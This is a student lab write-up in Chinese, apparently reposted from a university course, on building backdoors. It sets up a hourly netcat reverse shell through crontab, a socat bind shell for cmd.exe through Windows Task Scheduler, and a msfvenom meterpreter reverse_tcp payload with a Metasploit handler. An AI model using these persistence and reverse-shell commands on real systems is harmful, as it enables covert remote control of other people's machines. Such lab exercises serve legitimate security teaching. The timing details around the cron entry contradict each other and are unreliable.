20155324《网络对抗》Exp2 后门原理与实践-优快云博客

本文介绍如何使用Netcat和Socat等工具实现不同操作系统间的Shell获取及数据传输，涵盖后门工具实践、定时任务设置等内容。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

先在Windows系统下，监听5324端口：
在Kali环境下，使用man crontab指令查看crontab命令的帮助文档，从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令，并将其存放于crontab文件中，以供之后读取和执行。
用crontab -e指令编辑一条定时任务，选择编辑器时选择基本的vim编辑器就行：用crontab -e指令编辑一条定时任务，选择编辑器时选择基本的vim编辑器就行
在最后一行添加13 * * * * /bin/netcat 192.168.1.103 5324 -e /bin/sh，意思是在每个小时的第37分钟反向连接Windows主机的5324端口，设置成37的原因是我当时的时间是19点36，为了能立马看到效果，所以我将时间设置在了一分钟以后：
当时间到了16点13时，此时已经获得了Kali的shell，可以输入指令（如果在这之前输入指令，屏幕上不会有显示，但是等到了13分时会立马显示出来）：

socat是ncat的增强版，它使用的格式是socat [options] <address> <address>，其中两个address是必选项，而options 是可选项。
socat的基本功能就是建立两个双向的字节流，数据就在其间传输，参数address就是代表了其中的一个方向。所谓流，代表了数据的流向，而数据则可以有许多不同的类型，命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

在Windows系统下，打开控制面板->管理工具->任务计划程序，创建任务，填写任务名称后，新建一个触发器：
在操作->程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5324 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口5324，同时把cmd.exe的stderr重定向到stdout上：
创建完成之后，按Windows+L快捷键锁定计算机，再次打开时，可以发现之前创建的任务已经开始运行：

此时，在Kali环境下输入指令socat - tcp:192.168.1.103:5324，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的5324端口，此时可以发现已经成功获得了一个cmd shell：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5324 -f exe > 2015324_backdoor.exe

生成后门程序：

通过nc指令将生成的后门程序传送到Windows主机上：

在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口：

在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp，继续设置IP(此处设置虚拟机的Linux的IP地址）和端口

Linux使用exploit命令开始监听，此时在Win上执行后门程序。

打开Windows上的后门程序：

此时Kali上已经获得了Windows主机的连接，并且得到了远程控制的shell：

通过本次实验我都惊了！通过电脑直接的控制来实现一些功能，从而达到目的。所以我们要在日常使用电脑的过程中正确的使用，不让居心不轨者有可乘之机。

转载于:https://www.cnblogs.com/wang5324/p/8645655.html